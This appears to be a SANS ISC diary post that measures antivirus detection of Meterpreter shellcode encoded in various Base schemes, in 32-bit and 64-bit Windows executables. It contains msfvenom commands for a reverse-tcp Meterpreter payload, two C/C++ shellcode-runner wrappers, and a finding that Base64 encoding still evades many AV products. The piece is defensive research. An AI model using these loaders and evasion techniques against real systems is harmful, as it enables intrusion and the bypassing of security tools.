All your Base are...nearly equal when it comes to AV evasion, but 64-bit executables are not

Published: 2021-05-27
Last Updated: 2021-05-27 09:28:34 UTC
by Jan Kopriva (Version: 1)
0 comment(s)

Malware authors like to use a variety of techniques to avoid detection of their creations by anti-malware tools. As the old saying goes, necessity is the mother of invention and in the case of malware, it has lead its authors to devise some very interesting ways to hide from detection over the years – from encoding of executable files into valid bitmap images[1] to multi-stage encryption of malicious payloads[2] and much further. Many of these techniques continue to be used efectively in the wild by malicious actors as well as by red teams that emulate them. Probably none of these techniques (perhaps with the exception of simple XOR encryption) has been used so widely as Base64 encoding of malicious payloads.

Base64[3] is among the worlds best-known binary-to-text encodings. It is commonly used to encode binary data so it can be easily transmitted over networks and most of us use it in one way or another on daily basis. Since – as we’ve mentioned – so do malicious actors, it is also the “go to” encoding that security analysts tend to try first when looking at data that appears to be encoded in some way (especially if it ends in the telltale equal sign or two). Base64 however isn’t the only encoding scheme out there, and it isn’t even the only Base-based one (if you forgive the pun).

Since it has been also used extensively (for example for data exfiltration using DNS[4]), many are aware that a Base32 encoding scheme also exists. But the story doesn’t end there and many other, more obscure Base encodings are being used as well. Even if we just look at the encoding schemes supported by CyberChef[5], we can see several others.

The availability of these lesser-known Base encodings in CyberChef has lead me to an idea – since Base64 is so prevalent, one might expect most anti-malware tools to be able to easily handle known malicious payloads encoded by it as well (after all, since YARA is capable of Base64 encoded versions of strings[6], why wouldn’t AVs be able to do the same). Would that however hold for the other encodings as well? Or, to put it differently, would it make sense for a malicious actor or red teamer to encode a malicious payload using some other scheme if they were trying to get past an anti-malware scan?

To find out whether there would be any advantage to using other encodings than Base64 to hide a malicious payload, I’ve devised a simple test. I would generate a shellcode that should probably be identified as malicious by most anti-malware tools on the market, encode it using different Base encodings supported by CyberChef (all except for Base85), put each encoded “payload” into a shellcode wrapper, compile it and check what detection score would the resulting file have on VirusTotal. To make things a little bit more comprehensive, I would do this for 32-bit as well as 64-bit executables and payloads.

Admittedly, results of this little experiment would be far from representative when it came to the ability of different Base encodings to hide malicious content, but they should be enough to show if using other scheme then Base64 could make at least some difference.

The shellcode I’ve decided to use for the test was a simple staged Meterpreter reverse-tcp payload generated by MSFvenom using the following commands, since this is something that one would expect most anti-malware tools to be able to catch.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -a x64 -f c
msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -a x86 -f c

I have put the resulting 32-bit and 64-bit shellcode into the following C++ wrapper from GitHub[7] and compiled it into executable binaries.

#include <windows.h>
#include <iostream>

int main(){
    static const int code_lenght = [length];
    unsigned char opcodes[code_lenght] = [shellcode];

    HANDLE mem_handle = CreateFileMappingA( INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0,  code_lenght, NULL);
    void* mem_map = MapViewOfFile( mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, code_lenght);
    memcpy(mem_map, opcodes, sizeof(opcodes));
    std::cout << (( int(*)() )mem_map)() << std::endl;
    return 0;
}

I then encoded both pieces of shellcode using each of the Base encodings I wanted to try and compiled the resulting code.

I didn’t add any functionality for decoding of the encoded payload, so the resulting executables would not actually cause the embedded shellcode to run if they were executed (instead of valid shellcode, they would try to execute its encoded form, which would of course not work). However, for the purposes of our test, this shouldn’t have made any difference.

In order to identify the number of detections caused by the shellcode wrapper and not the (encoded) shellcode itself, I have also compiled a “control” executable that only contained one NOP instruction as its payload.

I then ran each of the resulting executables through VirusTotal. As you may see from the following chart, there was no significant difference between detections of differently encoded shellcode, or between our control executable and the ones that carried the encoded Meterpreter. All 32-bit executables with encoded shellcode were detected by 1 more AV then the wrapper with the NOP instruction and only the Base64-encoded 64-bit executable had 1 more detection then the control executable.

Since I found the results a little bit surprising, I decided to try the same test using a different shellcode wrapper – I chose a code that tries to execute shellcode using a simple pointer to it. This is a well-known historical technique that wouldn’t work on modern operating systems but should be easily spotted by anti-malware tools.

#include<stdio.h>
#include<string.h>

unsigned char shellcode[] = [shellcode];

main()
{
    int (*call)() = (int(*)())shellcode;
    call();
}

As we can see from the following chart, there was indeed a significant overall increase in the number of detections. Although between 64-bit executables, the number of detections was again nearly the same (8 for Base32 and Base64, 9 for Base58 and Base62 encodings), there were some small differences in detections of 32-bit executables. The two containing shellcode encoded by Base58 and Base62 actually scored lower than our control binary.

Although this variance in the number of detections is interesting, given our other results, it seems that there is generally very little difference between the protection from AV detection that Base64 and the lesser-known Base encodings can provide, at least when it comes to encoding of shellcode.

As we’ve mentioned before, however, the results are hardly representative and would certainly be quite different if we were to try to encode some other type of well-known malicious payload than a staged Meterpreter (a stageless Meterpreter or something containing the string “invoke-mimikatz” come to mind) or if we were to try a similar test using a larger sample size. In general, however, it seems that even a simple Base64 encoding of shellcode is still a viable way to get past many AV solutions out there.

Still, it is good to keep in mind that the available encodings don’t end with Base64, since for red teamers and blue teamers both, the other variants might come in useful from time to time.

What is more surprising than the aforementioned “effectiveness” of Base64 encoding, however, are the significant differences between the detections of 32-bit and 64-bit versions of the same code. Although most of us tend to think that the time when anti-malware solutions struggled with detecting malicious 64-bit code is far behind us, it would seem, that this is still not truly the case…

[1] https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/
[2] https://isc.sans.edu/forums/diary/Agent+Tesla+hidden+in+a+historical+antimalware+tool/27088/
[3] https://en.wikipedia.org/wiki/Base64
[4] https://isc.sans.edu/diary/DNS+Query+Length...+Because+Size+Does+Matter/22326
[5] https://gchq.github.io/CyberChef/
[6] https://isc.sans.edu/forums/diary/YARA+v400+BASE64+Strings/26106/
[7] https://gist.github.com/angelorodem/fd3f074a27ddf2708ee74a5ad32704d9

-----------
Jan Kopriva
@jk0pr
Alef Nula

Keywords: Encoding Malware
0 comment(s)

Comments


Diary Archives